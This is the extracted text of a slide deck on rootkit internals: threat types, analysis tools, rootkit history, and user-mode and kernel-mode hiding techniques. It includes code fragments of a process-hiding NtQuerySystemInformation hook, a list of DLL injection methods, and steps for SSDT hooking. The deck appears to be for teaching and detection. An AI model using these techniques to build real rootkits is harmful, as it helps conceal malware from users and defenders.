Rootkit Internals By- Mr. Omkar Pardeshi

Malware Analyst & Developeromkar.r.pardeshi@gmail.com

Types of threats Tools to Analyze threats Methodology of analysis of Malwares. Rootkit internals. Fighting with Rootkit.

Topics Overview

Basic Worm-Replicate Trojan-Stand alone File infector-Infect Adware, Spyware, Backdoor , Boot Sector

Virus, Browser Hijacker,  Macro Virus, Polymorphic

Virus, Scripting Virus, Logic Bombs,Metamorphic .

Classification of computer viruses

Sysinternal suit Procmon Process explorer. Regmon ,Regshot Pe view Systracer

Tools to analyze computer virus

1982 Siberian pipeline sabotage 2001 Magic Lantern 2005 Sony BMG copy protection rootkit

scandal digital rights management software called Extended Copy Protection.

Mark Russinovich 2004–2005 Greek wiretapping case  Rootkit.Duqu.A

Trail of Rootkit

is just a technology Subverting standard operating system. the design goals of a rootkit are to provide

three services: 1>remote access.2> monitoring.3>concealment.

Rootkit

Real mode :-ring 3 -MS-DOS kernel .- Interrupt Service Routines (ISRs). &

Interrupt vector table(IVT) . protected mode:- ring 0 -system os loads in protected mode called

ring 0 or os kernel mode-unprivileged area called ring 3 or user mode.

Types

User mode

Kernel mode

User mode Rootkit Demo

What happen Exactly..?Os level

Process Level

Taskmgr

NTDLL

Ntoskernel.exe

NTDLL

AppInitHook

Taskmgr After inject

NtqueryInfo

result

DeliverModified result

Memory Level

`

AppInitHook

NTDLL

0x2000

0x6500 NtQuerySystemInformation

0x6000

0x6500

0x2100

NtQuerySystemInformation

Ret 0x2100

Call to ntdll

AppInit_DLLs -HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT \CurrentVersion\Windows 

Other ways SetWindowsHook. WriteProcessMemory+CreateRemoteThread Change in import table.

Dll injection

Code Injection-inject dll

-Create Remote thread.

-write physical memory

-Hooking

Lot of ways to inject your code

AppInit_DLLs  DllMain Hook NtQuerySystemInformation HookedNtQuerySystemInformation

NtQuerySystemInformation( __in SYSTEM_INFORMATION_CLASS SystemInformationClass,__inout PVOID SystemInformation, __in ULONG SystemInformationLength, __out_opt PULONG ReturnLength )

User mode Rootkit Demo Details

HookedNtQuerySystemInformation( __in SYSTEM_INFORMATION_CLASS SystemInformationClass, __inout PVOID SystemInformation, __in ULONG SystemInformationLength, __out_opt PULONG ReturnLength )

Call to original NtQuerySystemInformation

PMY_SYSTEM_PROCESS_INFORMATION pNext = (PMY_SYSTEM_PROCESS_INFORMATION)SystemInformation;

if (!wcsncmp(pNext->ImageName.Buffer, L"calc.exe", pNext->ImageName.Length))

Return result

Kernel Mode Rootkit Demo

What happen Exactly..?

In kernel

Get Address of SSDT Get offset address of functions from SSDT Save Address Write Address of our function into SSDT If query call is for our file deny access If not call original function from saved

address.

Algo For Kernel Fun hooking

Ways root kit to system-SSDT hook-Shadow SSDT hook w32k.sys-FS callback-Registry Callback-Interrupt Descriptor Table (IDT)-Register Notify Routines-Windows hook-Driver hook-Dispach hook-keyboard hook-System thread-list goes on

Welcome in Kernel mode

Gmer Rootkkit unhooker Sysrevaler Various rootkit scanners. To stay secure use updated AV & install all

the security patches.

Detection Tools

Questions…….?

Thank you